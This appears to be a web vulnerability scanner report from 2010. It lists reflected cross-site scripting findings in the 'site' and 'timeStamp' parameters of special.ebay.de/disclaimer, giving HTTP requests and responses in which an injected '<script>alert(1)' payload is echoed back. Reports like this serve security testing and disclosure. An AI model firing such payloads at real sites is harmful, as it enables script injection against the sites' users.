1. Cross-site scripting (reflected)
1.1. http://special.ebay.de/disclaimer [site parameter]
1.2. http://special.ebay.de/disclaimer [timeStamp parameter]
Severity: | High |
Confidence: | Certain |
Host: | http://special.ebay.de |
Path: | /disclaimer |
GET /disclaimer?camp=cp&site= Host: special.ebay.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: max-age=0, must-revalidate, private Set-Cookie: JSESSIONID=4E5598DEE Content-Type: text/html;charset=utf-8 Date: Fri, 10 Dec 2010 18:42:05 GMT Set-Cookie: NSC_qtdq-v-iuuq-8080 Content-Length: 760 <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Disclaimer</title> <style> .title{ color:#0000cc; font-family: Trebuchet MS; font-size:14px; ...[SNIP]... <p class="msg">How did we compare? We compared the current lowest selling price of this item on eBay to the lowest price we could find on walmart.com 86ca5<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://special.ebay.de |
Path: | /disclaimer |
GET /disclaimer?camp=cp&site= Host: special.ebay.de Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Pragma: no-cache Cache-Control: max-age=0, must-revalidate, private Set-Cookie: JSESSIONID=6503BB3F9 Content-Type: text/html;charset=utf-8 Date: Fri, 10 Dec 2010 18:42:05 GMT Set-Cookie: NSC_qtdq-v-iuuq-8080 Content-Length: 760 <html><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <title>Disclaimer</title> <style> .title{ color:#0000cc; font-family: Trebuchet MS; font-size:14px; ...[SNIP]... ing price of this item on eBay to the lowest price we could find on walmart.com and counted how many of this item were available at this low price. Prices and available numbers last checked at 10:13fdf3c<script>alert(1)< ...[SNIP]... |